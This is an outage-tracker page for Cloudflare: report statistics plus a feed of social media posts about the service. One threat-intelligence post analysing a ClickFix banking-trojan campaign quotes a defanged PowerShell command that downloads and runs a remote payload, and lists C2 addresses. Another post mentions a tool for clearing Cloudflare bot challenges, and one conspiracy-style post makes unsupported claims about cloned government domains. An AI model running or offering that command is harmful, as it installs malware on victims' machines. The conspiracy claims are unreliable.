1. Home
  3. Companies
  5. Cloudflare
Cloudflare

Cloudflare status: hosting issues and outage reports

No problems detected

If you are having issues, please submit a report below.

Full Outage Map

Cloudflare is a company that provides DDoS mitigation, content delivery network (CDN) services, security and distributed DNS services. Cloudflare's services sit between the visitor and the Cloudflare user's hosting provider, acting as a reverse proxy for websites.

Problems in the last 24 hours

The graph below depicts the number of Cloudflare reports received over the last 24 hours by time of day. When the number of reports exceeds the baseline, represented by the red line, an outage is determined.

At the moment, we haven't detected any problems at Cloudflare. Are you experiencing issues or an outage? Leave a message in the comments section!

Most Reported Problems

The following are the most recent problems reported by Cloudflare users through our website.

  • 36% Domains (36%)
  • 31% Cloud Services (31%)
  • 17% Hosting (17%)
  • 11% Web Tools (11%)
  • 6% E-mail (6%)

Live Outage Map

The most recent Cloudflare outage reports came from the following cities:

CityProblem TypeReport Time
Manchester Domains 23 hours ago
Angers Cloud Services 12 days ago
London Domains 14 days ago
Noida Hosting 27 days ago
Jewar E-mail 28 days ago
Braga Web Tools 28 days ago
Full Outage Map

Community Discussion

Tips? Frustrations? Share them here. Useful comments include a description of the problem, city and postal code.

Beware of "support numbers" or "recovery" accounts that might be posted below. Make sure to report and downvote those comments. Avoid posting your personal information.

Cloudflare Issues Reports

Latest outage, problems and issue reports in social media:

  • YourPrivateProx
    Your Private Proxy (@YourPrivateProx) reported

    @lea7hersm17h FlareSolverr clears the JS challenge. It doesn't fix IP reputation — if your exit is already flagged, Cloudflare just serves another challenge after each solve. Works on clean IPs at low scale. Breaks on shared or abused exits.

  • rohit_jsfreaky
    Rohit Kashyap | AI + Full-Stack (@rohit_jsfreaky) reported

    @EddCoates that nginx 500 is the scrapers basically ddosing you for free training data. robots txt is a polite suggestion they ignore now. what actually helps, put cloudflare in front with bot fight mode on, rate limit per asn not per ip since they rotate addresses, and consider a tarpit for the worst offenders. it is not legal so much as unenforceable at their scale, which is the real problem

  • kocer_eth
    kocer (@kocer_eth) reported

    7 FREE AI API/TOOL TIERS YOU CAN USE TODAY BEFORE BUYING ANOTHER AI SUBSCRIPTION If you build agents, bots, research tools or small automations, start with this stack. 1. OpenRouter Use it as the router. It exposes free-priced models in the model list, so you can test routing before paying per token. 2. Google AI Studio / Gemini API Good for prototypes, evals, long-context tests, and agent experiments. Check the free tier before you burn paid credits elsewhere. 3. Cloudflare Workers AI Best when you want inference close to your app. The useful part is not just “free AI” — it sits inside the same place you can deploy Workers. 4. GroqCloud Use it when speed matters. Great for bots, voice loops, extraction, and any workflow where slow responses kill the demo. 5. GitHub Models Best for prototyping inside the GitHub flow. If your code, prompts, and tests already live there, this removes friction. 6. Tavily Research/search API for agents. Free plan shows 1,000 API credits/month, useful for browsing agents and research bots. 7. ElevenLabs Voice layer. Free plan shows 10k credits/month, enough to test narration, agents with voice, and demo content. > My rule: never build production on a free tier first. > Use free access to test: - latency - rate limits - output quality - tool calling fit - billing behavior - whether your agent actually needs the premium model Then pay only for the part that survives real usage. Most people skip this and buy 3 subscriptions before they even know which API call matters.

  • techseovitals
    Martin Stepanek 🏳️‍🌈 (@techseovitals) reported

    🟣 Underrated #TechSEO Tip GPTBot, ClaudeBot, and PerplexityBot all respect robots.txt. Block them and your content never appears in AI answers. Worth flagging that Perplexity's compliance has been disputed – Cloudflare found evidence they used undeclared crawlers to bypass robots.txt. I see site owners block these crawlers without realizing they killed an entire traffic channel. Check your robots.txt right now. Look for blanket `Disallow: /` rules targeting AI user agents. You might be invisible in AI search and not even know it.

  • SpecialSitsNews
    Special Situations 🌐 Research Newsletter (Jay) (@SpecialSitsNews) reported

    New Activist Name: Shares of $MTN are trading up 13% at $141.65 on Thursday, rebounding sharply from their 52-week low of $118.51 hit earlier this year, as the Semafor scoop circulates across trading desks. The intraday move lifts the company's market cap to roughly $5.05 billion. According to Semafor, Vail's bankers are tasked with assessing vulnerabilities across a broad front: labor unrest, weather-related demand swings, and the specific pressure campaign being waged by Prince, who co-founded Cloudflare (NET). Prince told a local Colorado publication in June 2026 that he is willing to invest $500 million in Park City Mountain Resort and admitted he has already fielded calls from activist investors probing Vail's weaknesses. His preferred blueprint would see Vail pivot to an asset-light model, acting as a partnership facilitator rather than a direct mountain owner, a structure that would almost certainly require carving up the company's core real-estate holdings. The timing is awkward for management. Vail reported fiscal Q3 2026 earnings per share of $8.81, missing the consensus estimate of $9.09 by 3.1%, while revenue of $1.21 billion came in roughly $10 million below forecasts. The company subsequently cut its fiscal 2026 net income guidance to a range of $128 million to $162 million and trimmed Resort Reported EBITDA guidance to $735$755 million, down from the prior range of $745$775 million. Net debt has climbed to $2.65 billion from $2.24 billion a year earlier, pushing net leverage to 3.5x trailing twelve-month EBITDA as of April 30, 2026, while cash on hand stood at $371.4 million. Into that environment, the board moved in May 2025 to recall Rob Katz, the executive who originally built Vail into a multi-mountain empire, ousting his hand-picked successor in the process. Katz has since focused on the operational grievances that drove customer dissatisfaction, particularly lift-line congestion and chronic labor shortages, introducing products like Epic Friend Tickets and discounted super-advanced lift tickets that are showing early traction. The move signals that Vail's board views operational credibility as its first line of defense against any activist pitch centered on mismanagement. Management also has a financial lever to highlight in any proxy fight. The company pays a quarterly cash dividend of $2.22 per share, with the next payment scheduled for July 9, 2026, equating to an annualized yield of roughly 6.6% at current prices. That yield argument, steady cash returns while the turnaround plays out, is a standard defensive talking point, though it carries less weight when leverage is rising and guidance is being cut. Investors will get a clearer read on whether Katz's operational fixes are gaining traction when Vail reports fiscal Q4 2026 results, tentatively scheduled for September 24, 2026. The setup is challenging: consensus EPS for that quarter stands at -$5.05, with eight analyst downward revisions in the past 90 days and no upward revisions, reflecting the structural headwinds Prince and any allied activist would likely exploit.

  • Sounsmooth
    Elizabeth (@Sounsmooth) reported

    @FBIPhiladelphia In Georgia they inputted Datalayers to cache and control. They then gather DNS and block the original government domain. They create a clone using Cloudflare London and Amazon. Then they wait 7 days. . . You know why. Then they activate it and viola a compromised Amazon fake government domain using a pre appointed L3 contractor who hired DEI employees are at the wheel with IT who ask the REF NAMED “Raj” Z and Kash’s buddy, who to blame for breaches is the GSA Zone 4 IC3. Kash Patel knows as do the IT volunteers. The China leak biz continues and RICO and bad guys thrive. AMERICANS LOSE. True story.

  • bgonzalesp
    Bernardo Gonzalez (@bgonzalesp) reported

    @CloudflareHelp @Cloudflare how do you expect we can contact support to gain access to my account, if you require to login to send a help request??? It's simple logic... I assume that your really don't care about helping your customers

  • steebchen
    Luca Steeb (@steebchen) reported

    @baanish @fayazara it's actually not true, you can use the CloudFlare AI gateway by setting it up in the dashboard and you'll get an URL which works with any SDK or library. however, personally I recommend to use @llmgateway as we support the full catalog of models and DevPass coding plan for 3x usage

  • ritakozlov
    rita kozlov 🐀 (@ritakozlov) reported

    at a lot of companies, product's role is to come up with ideas, carefully groom the roadmap and narrowly define requirements for engineering to (blindly) follow this maybe makes for an "easier" product role but limits creativity (and accounrability) one thing that's unique about cloudflare is that ideas can really come from so many more places product's role is to help map those ideas to customer problems and make sure we actually solve them and help get those ideas in customers' hands (aka actually ship it and make it good!) it makes for a much more interesting role and breeds so much innovation and leads to better experiences because engineering is not exempt from taking ownership in the deliverable. "i shippped what's in the PRD" is not good enough. you own the customer problems & solutions together

  • ankuragrawal420
    Ankur Agrawal (@ankuragrawal420) reported

    @araseb_ The ease of use primarily and native support for nextJs application out of the box with just 1 click. They have been charging people more and more with all the ridiculous upsells. They changed my build configuration to turbo automatically and charged me for build minutes. Thats when I decided to move to Cloudflare and its completely free

  • poke6900gg
    POKE6900 (@poke6900gg) reported

    We are aware the website is down and due to this the apps aren't working as they should. This is due to a Cloudflare issue and we are working on a solution to get everything back online a.s.a.p.

  • Pushkarm029
    Pushkar Mishra (@Pushkarm029) reported

    Just install Cloudflare WARP. No login. One click solution. No ads.

  • starmexxx
    starmex (@starmexxx) reported

    WHY WASTE 16 MINUTES OF YOUR TIME ON THIS AI ENGINEER EUROPE TALK WHEN I CUT THE 5 BEST MOMENTS INTO 4 MINUTES FOR YOU bright data engineer exposed why your ai agent lies about searching the web. cloudflare blocks 20% of web from ai. 60% of chatgpt citations are broken. agents hallucinate instead of saying "i can't" 00:00 - llms are programmed to please. they make things up instead of saying "i can't" 00:42 - cloudflare blocks 20% of web. 60% of chatgpt citations are broken 02:03 - gpt-5 fails all 5 web tasks without proper tools. zero out of five 02:42 - cloudflare labyrinth feeds ai fake data. bigger hallucinations 03:13 - don't parse with llm. build a parser. saves 99% of tokens bookmark this and watch the supercut below

  • thinkistillcare
    sw1tch.sh (@thinkistillcare) reported

    suddenly i start getting captchas on google and cloudflare it has to be my IPTV service on my fire stick right?

  • fraey0
    ƒrαeყ (@fraey0) reported

    it costs about $21/month to run what could become a multi-million dollar startup • human brain = reasoning (free) • claude = coding ($20/mo) • supabase = backend (free) • vercel = deployment (free) • namecheap = domain ($12/yr) • stripe = payments (2.9%/trx) • github = versioning (free) • resend = email (free) • clerk = auth (free) • cloudflare = DNS (free) • posthog = analytics (free) • sentry = error tracking (free) • upstash = redis (free) • pinecone = vector DB (free) everything sums up to roughly $20 to $25 per month so, the tools are not the barrier anymore. most ideas don’t fail because they’re expensive to build. they fail because they never get built at all. what’s stopping you?

  • Dety0
    Dety (@Dety0) reported

    ServiceDesk tier list S: Cloudflare is down A: Password Reset, PC Crashing B: Data Backups C: Phishing Mails D: New User Onboarding, Meeting Room Setup F: Outlook Classic, PRINTERS

  • Cisco_research
    Francisco T. Barbosa (@Cisco_research) reported

    @YashasGunderia I believe this is more a Cloudflare thing. Lots of issues with log in/log out

  • stilleclectic
    CAPED CRUSADER🦇 (@stilleclectic) reported

    @matthansbello Sigh, everything was originally done on namecheap but I’ve now just moved the dns to cloudflare. Waiting to see if that fixes the issue

  • DFIR_Radar
    DFIR Radar (@DFIR_Radar) reported

    AI-generated ClickFix lure impersonates a Brazilian 🇧🇷 bank to drop SmartRAT, a PowerShell banking RAT with QR-swap, keylogging, and fake overlay capabilities. The C2 panel had no server-side auth. Key findings: - Full infection chain: typosquatting domain cartaobb[.]com mimics cartaobrb[.]com[.]br, fake Cloudflare CAPTCHA triggers clipboard injection, fake BSOD locks the browser, then victim pastes: powershell "$k8='hxxp://64[.]95[.]13[.]238/st.txt';iex(irm $k8)" into Run. Three-stage PowerShell dropper pulls payload[.]php, AES-CBC decrypts SmartRAT in memory. Hashes: st.txt 297eb45f028d44d750297d2f932b9c91, RAT b17ccdb5531555e43f082d6e77c07227. - SmartRAT (SMART_V25) persists as scheduled task or Windows service named MicrosoftEdgeUpdateCore (T1543.003), copies itself to %APPDATA%\Microsoft\Diagnosis\ETW\msedgeupdate.txt, logs all activity to C:\ProgramData\Microsoft\Diagnosis\ETW\client_debug.log and per-PID logs. - C2 at c[.]windowsupdate-cdn[.]com port 51888 (fallback 162[.]141[.]111[.]227), AES-CBC encrypted over raw TCP. QR-swap feature overlays attacker QR at exact pixel coordinates of the legitimate banking QR to redirect transactions. Monitors window titles for santander, bradesco, itau, nubank, binance, and a dozen more. - The C2 panel (branded MyGood PRO) bypasses auth by checking only localStorage values authToken and currentUser client-side with no server validation, exposing the full admin panel to anyone who sets those keys. #DFIR_Radar

  • AyushmanMallick
    Ayushman Mallick (@AyushmanMallick) reported

    5/ You hand over a paid API key, so it's security-reviewed. The key goes only over HTTPS, only in a header, to one stateless @Cloudflare proxy that never stores it. XSS and SSRF hardened. Templates use a strongly-consistent Durable Object. The proxy is fully open-source.

  • cshperspectives
    Richard Sever (@cshperspectives) reported

    @manuelrivascruz working on solutions to this. the problem as I'm sure you can imagine is like so many sites we are being hammered by LLM bots in addition to all the DDOS attacks, so (again like many others) use services like Cloudflare to ensure human readers maintain access

  • DWBB1984
    DownWithBigBrother (@DWBB1984) reported

    @ultrasxiv Fair on bandwidth being a real cost, but the 2GB figure is a long way out. Cheapest DO droplet includes 500GB+ outbound, Hetzner 20TB+. At 600-700GB household use you’re a pound or two over on DO, zero on Hetzner. Stays around the base £4-5 for most, not £300. And “un-bannable” was the precise word, not hyperbole. A commercial VPN is bannable because it’s a named brand with known IPs, a company that can be pressured or blocked. That’s the weakness. Self-hosting removes the target entirely. There’s no technical category called “a VPS used as a VPN.” It’s a rented server running standard encryption (WireGuard, IPsec), the same protocols carrying every bank settlement, ATM link and corporate tunnel on earth. To ban it you’d have to block those protocols (killing Visa, every corporate VPN, all remote work) or blacklist the datacentre IP ranges (AWS, Hetzner, OVH) that host the actual internet: payment gateways, banking backends, Stripe, Cloudflare, gov services. You can’t separate “server someone might tunnel through” from “server running the shop you’re buying from.” The second and third-order effects would cripple e-commerce, open banking and logistics, all riding the same cloud backbone. That’s the sovereignty point. You can ban a brand. You can’t ban the capability of renting a server and encrypting your own traffic, not without taking modern commerce down with it.

  • ZunairaAi
    Zunaira Ai (@ZunairaAi) reported

    6. Default DNS Resolution Lag What it does: When your TV tries to load the image thumbnails for an app like Netflix, it uses your Internet Service Provider's default DNS server to find out where those images live on the internet. Think of DNS as the internet's phone book. Why it kills performance: ISP phone books are notoriously slow and incredibly outdated. Often, your TV is not actually lagging at all. The processor is fine, but the TV is frozen waiting for your internet provider to tell it where to download the movie poster graphics. *********** it: Settings → Network → Network Status → IP Settings → DNS Setting → Enter Manually. Change the numbers to 8.8.8.8 (Google) or 1.1.1.1 (Cloudflare). You will literally watch your streaming apps load twice as fast.

  • 0xfa7b
    Ahmed Aldeab (@0xfa7b) reported

    Stopping the bad guys with Cloudflare: 885 malicious requests blocked or challenged in the last month #cloudflare

  • TooTrill4Thiss
    JD (@TooTrill4Thiss) reported

    @BoringBiz_ Every business doesn't need a custom agent. It needs an enterprise plan and a few capable devs who can map it, and deploy agents. building automation that don't rely on agent compute. like hello??? app scripts, compute engine, cloudflare workers. ******** are people doing?

  • 0xWast3
    wast3 (@0xWast3) reported

    A DEVELOPER BUILT AN ENGINEERING SITE FOR A CORPORATE CLIENT AND CHARGED $3,200 FOR IT the hosting bill was $0, the domain was $0, the SSL was $0 he registered a free domain on DigitalPlat, pointed it at Cloudflare in twenty minutes, and deployed the site on Cloudflare Pages the client saw a live URL with a padlock and never asked what it cost to run here's the full stack he used: DigitalPlat free domain - no card, no renewal creep Cloudflare free plan - DNS, CDN, DDoS protection, SSL auto-issued Cloudflare Pages - connected to GitHub, builds and deploys automatically total infrastructure cost: $0, managed from one dashboard the mistake most developers make is paying three companies on three renewal cycles for every experiment they ship once the stack was locked, every new client demo went live in fifteen minutes $3,200 charged, $0 spent on infrastructure the margin was the entire point register first, deploy second, invoice third

  • suny_nick
    Nick Sunny (@suny_nick) reported

    @EddCoates I had similar issues. If you use Cloudflare, you can do what I did

  • tobymarshman
    Toby Marshman (@tobymarshman) reported

    Have you accidentally blocked yourself from AI search? OpenAI/Claude's searchbots get blocked more often than any other crawler, usually as a side effect of generic robots.txt templates, not intentional policy. >>The fix: -Open your robots.txt if you have one (go to yourdomain .com/robots.txt) -Remove any rules blocking OAI-SearchBot, PerplexityBot, or GPTBot. Instead add: User-agent: * Allow: / -If you're using Cloudflare, check your bot management settings - set to 'Do not block (allow crawlers)' -If you're on a managed host, check their crawler settings too, many block non-Google bots by default If you're blocking those bots, you don't exist in AI search. Have you done this?

  • Court_Reinland
    Court Reinland (@Court_Reinland) reported

    @EddCoates Cloudflare can help with this, they can tune out a lot of this.

  • fataloops
    oops (@fataloops) reported

    @EddCoates I have a (conspiracy) theory about this- Cloudflare is the one doing the scraping, millions of requests Your only option is to use cloudflare or take down the site